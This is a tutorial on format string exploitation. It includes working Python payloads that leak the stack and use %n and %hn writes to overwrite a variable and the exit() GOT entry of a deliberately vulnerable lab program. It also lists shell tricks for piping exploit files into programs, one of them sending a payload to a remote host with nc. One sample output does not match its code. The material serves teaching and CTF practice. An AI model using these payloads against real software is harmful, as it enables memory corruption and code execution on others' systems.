Binary Exploitation - Format Strings
Format Strings
There are days in hacking when things don’t work as expected, and that is what happened to our planned topic. Instead, we’ll have a look at a more historic topic: format string exploits.
The second half of the article is a quick reminder that you can execute stuff in bash in more than one way.
Overview
https://cs155.stanford.edu/papers/formatstring-1.2.pdf
- fprintf - prints to a FILE stream
- printf - prints to stdout
- sprintf - prints to a string
- snprintf - prints to a string with length checking
- setproctitle - set argv[]
- syslog - output to syslog
They all have in common that they take a format string.
- the format string is passed as the format argument (the first argument of printf), and the values it refers to follow as additional arguments: char *buffer; printf("Test: %p", buffer);
- %s - string
- %p - pointer
- %d - decimal
- %x - hexadecimal
- %u - unsigned decimal
- %n - stores the number of bytes written so far in the int that the matching argument points to
If we provide more format strings than variables, we can observe the following behaviour:
int a = 10;
int *b;
char *c = "mystring";
printf("%x %x %x %x \n", a, b, c);
// Output:
// a 8048471 80484d0 1
Check the stack and notice: the first word is the return address and the second one points to our format string.
$ x/6wx $esp
0xbfffef7c: 0x0804843d 0x080484d8 0x0000000a 0x08048471
0xbfffef8c: 0x080484d0 0x00000001
$ x/s 0x080484d8
0x080484d8: '%x %x %x %x \n'
The remaining four words are the same hex values that the format string printed. The caller is responsible for supplying the right number of arguments and printf has no way to check it, so there’s no segfault or error. As with every other function call on 32-bit x86, all arguments are pushed to the stack from right to left: the values to be formatted first and the pointer to the format string last, so it ends up next to the return address.
Missing variables are assumed to be items down the stack.
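The behaviour above can be imitated with a toy model. This is only a sketch: `STACK` and `toy_printf` are made-up names, the words are copied from the x/6wx dump above, and only %x is handled.

```python
import re

# Toy model only: the words after the return address, copied from the
# x/6wx dump in this article. Index 0 is the pointer to the format string.
STACK = [0x080484d8, 0x0000000a, 0x08048471, 0x080484d0, 0x00000001]

def toy_printf(fmt, stack):
    """Expand each %x with the next stack word, whether or not it was passed."""
    args = iter(stack[1:])  # skip the format string pointer itself
    return re.sub(r"%x", lambda _m: format(next(args), "x"), fmt)

# Three real arguments, four conversions: the fourth %x takes the next word.
print(toy_printf("%x %x %x %x \n", STACK), end="")
```

The fourth conversion has no matching argument, so the model, like printf, just takes the word that happens to come next.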
Example 2:
int a = 10;
int *b;
char *c = "mystring";
printf("%08p %08p %08p %08p \n", a, b, c);
// Output:
// 0x0000000a, 0x08048471 ,0x080484d0, 0x00000001, 0x0000000a, 0x080484d0
- Format string vulns were considered dead until 2019, when security researchers published several exploits that abused format string vulns and allowed pre-auth RCE on an SSL VPN appliance: https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- You can abuse format strings to get code execution
Chars that break puts, gets, scanf, printf
puts and printf stop at a null byte. gets reads null bytes as data and stops at a newline (0x0A). scanf with %s does not stop at a null byte either, only at whitespace: 0x09-0x0D and 0x20
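Before sending a payload it can help to check it for such bytes. The following is a minimal sketch, not a complete list: `TERMINATORS` and `bad_offsets` are hypothetical names, and the scanf entry assumes %s in the default C locale, where whitespace is 0x09-0x0D plus 0x20.

```python
import struct

# Bytes that end processing early. Assumption: scanf is used with %s in the
# default C locale, so whitespace means 0x09-0x0D plus 0x20.
TERMINATORS = {
    "printf": {0x00},  # output stops at the first null byte
    "puts": {0x00},
    "gets": {0x0A},    # input stops at the newline
    "scanf": {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20},
}

def bad_offsets(payload, func):
    """Return the offsets in payload that func would treat as a terminator."""
    return [i for i, b in enumerate(payload) if b in TERMINATORS[func]]

# An address whose lowest byte is 0x0a is cut off by gets and scanf.
print(bad_offsets(struct.pack("<I", 0x0804a00a), "gets"))
```

An empty list means the payload passes through that function untouched.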
Exploiting format strings
vuln.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void win()
{
    char *flag = "You won. Here's your flag MFOX{I_Kn0w_Form4t_Str1ngs}";
    printf(flag);
    _exit(1);
}

void vuln()
{
    char buffer[512];
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);  // user input is used as the format string
    exit(1);
}

int main(int argc, char **argv)
{
    vuln();
}
Let’s alter the execution flow to get to the win() function.
- vuln() reads user input from stdin into a 512-byte buffer
- That buffer is then passed as the format argument to printf
- If we provide user input like %x %x %x, the function will print contents of the stack
- What we didn’t know yet: printf can also write to memory
To exploit, start simple:
buff = ""
buff += "AAAA"
buff += " %p" * 10
print(buff)
As expected, we get random items from the stack. But could we also get the four A’s we put in earlier?
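One way to answer that question mechanically is to search the leaked words for the marker. This is a small sketch: `find_marker_index` is a hypothetical helper, and `sample` is made-up output for illustration, real values will differ.

```python
def find_marker_index(leak, marker=b"AAAA"):
    """Return the 1-based %p position that echoes marker, or None if absent."""
    # Little-endian: the bytes "AAAA" read back as the word 0x41414141.
    wanted = int.from_bytes(marker, "little")
    # The first token is the echoed marker itself, so skip it.
    for position, token in enumerate(leak.split()[1:], start=1):
        if token.startswith("0x") and int(token, 16) == wanted:
            return position
    return None

# Hypothetical program output for the payload above; real values will differ.
sample = "AAAA 0x200 0xb7fd1ac0 0xb7e8d7b0 0x41414141 0x20702520"
print(find_marker_index(sample))
```

The returned position is the number of stack words printf has to skip before it reaches our own input.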
Direct Parameter Access
http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
- Direct Parameter Access is a special format string layout. We can write %3$p to get the third value formatted as a pointer.
- So when we input AAAA %4$p we might get the output AAAA 0x41414141
- Unfortunately we cannot use AAAA %4$s to get the string representation instead of hex, the app will just segfault
The reason for this is: some format specifiers need a pass by reference, some need a pass by value. In C, pass-by-reference means a pointer to the argument.
- %s wants pass-by-reference, which we can’t supply - or can we? Sure enough, 0x41414141 likely isn’t a valid pointer address. But we can input whatever we want instead of AAAA
- %n wants pass-by-reference - and it allows writing bytes to memory instead of reading. But: it needs the format (int*)&address, that means a pointer to a valid memory location where the output of %n can be written to
- %p wants pass-by-value - it will directly print the values on the stack
- %d wants pass-by-value
- %u wants pass-by-value
- %x wants pass-by-value
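The difference between the two groups can be shown with a toy address space. This is only an illustration: `MEMORY` and `render` are made-up names, and the single mapped address is the one the earlier example printed for c = "mystring".

```python
# Toy address space: only this one address is "mapped" (taken from the
# earlier example, where c = "mystring" was printed as 0x080484d0).
MEMORY = {0x080484d0: b"mystring"}

def render(spec, word):
    """Format one stack word the way the given conversion would treat it."""
    if spec == "p":
        return format(word, "#x")  # by value: print the word itself
    if spec == "s":
        if word not in MEMORY:     # by reference: follow the pointer
            raise MemoryError(f"segfault reading {word:#x}")
        return MEMORY[word].decode()
    raise ValueError(f"unsupported conversion %{spec}")

print(render("p", 0x41414141))  # works, the word is only printed
print(render("s", 0x080484d0))  # works, the address is mapped
```

Calling `render("s", 0x41414141)` raises, which mirrors the segfault: %s has to dereference the word, and nothing is mapped at that address.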
Use %n to change the value of a variable
In the vuln.c app above, we created an int target as a global variable. If we provide the address of target to %n, we can change its value.
$ p &target
$1 = (<data variable, no debug info> *) 0x804a048 <target>
To exploit it, we need to provide the address in the proper endianness.
import struct
import sys
target_addr = 0x804a048
buff = b""                  # Python 3: build the payload as bytes
buff += struct.pack("<I", target_addr)
buff += b" %p" * 3          # Our input is reflected back to printf as
                            # 4th position on the stack
buff += b"A" * 0x41         # As %n writes "the number of bytes written"
buff += b"%n"               # we try that way to write 0x41 to "target"
sys.stdout.buffer.write(buff + b"\n")
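But if we check in GDB, the value is 0x64, not 0x41: %n counts everything printed so far, including the 4 address bytes and the output of the three %p. We need to adapt the exploit: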
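import struct
import sys
target_addr = 0x804a048
buff = b""
buff += struct.pack("<I", target_addr)
buff += b"A" * (0x41 - len(buff))  # pad so that exactly 0x41 bytes are printed
buff += b"%4$n"                    # write the count to the 4th parameter
sys.stdout.buffer.write(buff + b"\n")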
Back in GDB, p target finally gives us 0x41, and we are close to a “write-what-where” condition. Yet writing a memory address like 0x8040000 this way would require printing roughly 134 million characters. This will likely kill everything else, including the terminal. :D
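The arithmetic behind that payload fits in a small helper. This is a sketch under the same assumptions as above (32-bit little-endian target, our input at parameter 4); `n_write_payload` is a hypothetical name.

```python
import struct

def n_write_payload(addr, value, index):
    """Build addr + padding + %<index>$n so that %n stores value at addr."""
    prefix = struct.pack("<I", addr)  # these 4 bytes count as output too
    pad = value - len(prefix)
    if pad < 0:
        raise ValueError("value is smaller than the bytes already printed")
    return prefix + b"A" * pad + f"%{index}$n".encode()

payload = n_write_payload(0x804a048, 0x41, 4)
print(len(payload))
```

For the value 0x41 the padding is 61 bytes. For a value like 0x8040000 the same formula gives 134,479,868 bytes of padding, which is why a plain %n is impractical for writing addresses.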
%n short writes
Using the format %hn, we can write only 2 bytes at a time. Two such writes, one to the target address and one to the target address + 2, together overwrite a full 4-byte value. So, if we want to write:
0x41414141 to address 0x08040102
we need to
- write 0x4141 to 0x8040102
- write 0x4141 to 0x8040104
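This is getting complicated, so here is another example, where we want to write 0x41424344.
Because x86 is little-endian, the low half 0x4344 goes to the target address and the high half 0x4142 to the target address + 2. We write 0x4344 first and 0x4142 second.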
import struct
import sys
target_addr = 0x804a048
target_addr_high = 0x804a048 + 2
buff = b""
buff += struct.pack("<I", target_addr)
buff += struct.pack("<I", target_addr_high)
count = 0x4344 - len(buff)
buff += b"%" + str(count).encode() + b"p"  # %123p for example
buff += b"%4$hn"          # Direct Parameter Access, writing the value to
                          # 2 bytes, to the location pointed to by the 4th
                          # parameter on the stack
# count = 0x4142 - 0x4344 # intuitively we would try this but we already
                          # printed a lot of stuff we need to take into
                          # account for the actual length - this would
                          # result in target = 0x45464344
                          # In short: we can't go lower than the first
                          # number.
count = 0x14142 - 0x4344  # Using a trick: Making it a 3-byte value by
                          # adding 1 on the left, %hn drops that extra 1
buff += b"%" + str(count).encode() + b"p"
buff += b"%5$hn"          # 5th parameter: target_addr_high
sys.stdout.buffer.write(buff + b"\n")
Result: target = 0x41424344
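The two padding values follow from modular arithmetic, because %hn keeps only the low 16 bits of the running byte count. Here is a minimal sketch: `hn_counts` is a hypothetical helper, and it assumes each width is larger than the natural length of the value being printed.

```python
def hn_counts(value, already_printed):
    """Return the two padding widths for writing the low half, then the high half."""
    low, high = value & 0xFFFF, value >> 16
    first = (low - already_printed) % 0x10000
    # %hn keeps only the low 16 bits of the running total, so a smaller
    # second half is reached by wrapping around 0x10000.
    second = (high - low) % 0x10000
    return first, second

# 8 bytes (the two packed addresses) are printed before the first padding.
print(hn_counts(0x41424344, 8))
```

For 0x41424344 the second width equals 0x14142 - 0x4344, the same number the "adding 1 on the left" trick produces.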
To actually make something useful out of it, we could:
- Overwrite the return address with the address of the win() function (only without ASLR)
- We could place shellcode in the environment variables (those are on the stack, too!) and then use this address (only without ASLR)
- Overwrite the GOT address of another function, e.g. exit(), with the address of win()
- Overwrite dynamic sections like .dtors https://www.win.tue.nl/~aeb/linux/hh/formats-teso.html
import struct
import sys
win_addr = 0x80484eb          # look up all addresses in GDB or objdump
                              # of course only works without ASLR - if it's
                              # on we could try a bruteforce approach
exit_GOT_addr = 0x804a01c
exit_GOT_addr_high = 0x804a01c + 2
buff = b""
buff += struct.pack("<I", exit_GOT_addr_high)  # becomes parameter 4
buff += struct.pack("<I", exit_GOT_addr)       # becomes parameter 5
count = 0x804 - len(buff)
buff += b"%" + str(count).encode() + b"p"
buff += b"%4$hn"              # first we write the high bytes
count = 0x84eb - 0x804        # then the low bytes - if your calculation is off
                              # maybe go trial-and-error with GDB and adjust
buff += b"%" + str(count).encode() + b"p"
buff += b"%5$hn"              # 5 because exit_GOT_addr was packed second
sys.stdout.buffer.write(buff + b"\n")
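The script above writes the smaller half (0x0804) first, so no wrap-around is needed. That ordering can be automated. This is a sketch only: `hn_payload` is a hypothetical helper, it assumes our input starts at parameter `first_index`, and it pads with %c instead of the %p used above, because %c prints exactly the requested width.

```python
import struct

def hn_payload(addr, value, first_index):
    """Build a two-write %hn payload, writing the smaller 16-bit half first."""
    halves = sorted([(value & 0xFFFF, addr), (value >> 16, addr + 2)])
    payload = b"".join(struct.pack("<I", a) for _half, a in halves)
    printed = len(payload)
    for offset, (half, _a) in enumerate(halves):
        pad = half - printed
        if pad < 0:
            raise ValueError("half is smaller than the bytes already printed")
        if pad > 0:
            payload += f"%{pad}c".encode()  # %c pads to exactly pad bytes
            printed = half
        payload += f"%{first_index + offset}$hn".encode()
    return payload

# Addresses taken from the script above: exit() GOT entry and win().
print(hn_payload(0x804a01c, 0x80484eb, 4))
```

With the addresses from the script this yields the same two widths, 0x804 - 8 and 0x84eb - 0x804, and the same parameter numbers 4 and 5.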
http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
https://medium.com/@airman604/protostar-format-4-walkthrough-b8f73f414e59
Reminder: cat trick
If we manage to execute a shell, e.g. because it’s already in the win() function, but we don’t have stdin connected, we can use cat instead to keep it open and to redirect stdin:
$ (cat exploit.bin; cat) | ./vuln_app
As we learned in pwn.college, there are at least a dozen more ways to accomplish the same thing, and usually one works.
It’s impossible to cover over 1000 challenges, and everything we learned from the greatest course in history, in a few lines. We just tried to compile a bread-and-butter list; each entry makes sense in certain situations, surely not in all.
Utilizing FIFO for Input Redirection
Create a FIFO to send input to your application, emulating interactive stdin behavior in a scriptable manner.
$ mkfifo myfifo; cat exploit.bin > myfifo & ./vuln_app < myfifo
Leveraging tee for Output Inspection
Use tee alongside cat to inspect the payload being sent to the application, useful for debugging complex inputs.
$ (cat exploit.bin; cat) | tee debug_output.bin | ./vuln_app
Employing socat for Advanced I/O Redirection
socat can be used to create more complex bidirectional pipes, perfect for when you need to interact with network services.
$ socat EXEC:'./vuln_app',pty STDIN
Using tail -f for Persistent Input
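Similar to cat, tail -f /dev/null can be used to keep a session open indefinitely. It never exits and never sends data, so it holds the pipe open after the payload without forwarding anything typed on the terminal.
$ (cat exploit.bin; tail -f /dev/null) | ./vuln_app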
Redirecting with echo and cat
Combine echo with cat for situations where initial setup commands are followed by a need for persistent stdin.
$ (echo "initial command"; cat) | ./vuln_app
Combining cat with nc for Network Interaction
When dealing with network sockets, nc (netcat) combined with cat can be used to interact with remote services.
$ cat exploit.bin | nc target.com 1234
Scripting Interaction with Python
Python’s subprocess module can script interaction with processes, offering a programmable alternative to cat.
import subprocess
process = subprocess.Popen(['./vuln_app'], stdin=subprocess.PIPE)
process.communicate(input=b'exploit data\n')
Redirecting input with Python for more control
Python can be used for more complex input redirection scenarios, especially when you need to process data before sending it.
import subprocess
with open('exploit.bin', 'rb') as f:
    subprocess.run(['./vuln_app'], stdin=f)
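The `(cat exploit.bin; cat)` idea can also be scripted: send the payload first, then keep writing to the same stdin. The following is a minimal sketch for small inputs. `send_then_follow_up` and `echo_child` are hypothetical names, and the echoing child only stands in for ./vuln_app.

```python
import subprocess
import sys

def send_then_follow_up(cmd, payload, follow_up):
    """Write payload, then follow_up, to cmd's stdin and return its stdout."""
    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    proc.stdin.write(payload)    # the exploit goes first
    proc.stdin.flush()
    proc.stdin.write(follow_up)  # stdin is still open for further commands
    out, _ = proc.communicate()  # flushes, closes stdin and waits for exit
    return out

# Stand-in child that echoes stdin; replace with ['./vuln_app'] in practice.
echo_child = [sys.executable, "-c",
              "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"]
print(send_then_follow_up(echo_child, b"exploit data\n", b"id\n"))
```

Unlike the interactive cat, the follow-up commands are fixed in advance here, which is often enough to read a flag.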
Executing with bash for dynamic command execution
Use bash -c to dynamically construct and execute commands, leveraging exec’s ability to replace the shell with a command or application.
$ bash -c 'exec ./vuln_app < <(cat exploit.bin)'
Piping into exec for inline execution
Incorporate pipes with exec: each side of a pipeline runs in its own subshell, so exec replaces that subshell with the application instead of starting one more process.
$ cat exploit.bin | exec ./vuln_app
Using exec with file descriptors
Manipulate file descriptors directly with exec to redirect them before executing a command, providing precise control over where data is sent and received.
$ exec 3< exploit.bin; exec ./vuln_app <&3
Exec and tee for live feedback
Combine exec with tee to send all further output of the shell through tee, duplicating the application’s output for live monitoring.
$ exec > >(tee /dev/tty) 2>&1; cat exploit.bin | ./vuln_app
Using cat with FIFO for input redirection
Redirect stdin through a FIFO pipe to simulate live input or feed data progressively.
$ mkfifo mypipe
$ cat exploit.bin > mypipe & ./vuln_app < mypipe
Using expect for interactive applications
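expect is a tool for automating interactive applications; it runs them under a pseudo-terminal. The payload is read inside expect, because $(...) is not expanded within single quotes.
$ expect -c 'spawn ./vuln_app; set f [open exploit.bin rb]; send -- [read $f]; close $f; send -- "\r"; interact'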
Sending signals with kill and trap
Combine cat with kill to send signals based on content read, useful for triggering actions in a program.
$ cat signal_trigger.txt | while read line; do kill -"$line" $(pidof vuln_app); done
Combining echo and redirection for simple payloads
For smaller, simpler payloads, echo combined with shell redirection can be effective. The /dev/tcp path used here is a bash feature, not a real device file.
$ echo -e "GET / HTTP/1.1\r\n\r\n" > /dev/tcp/localhost/80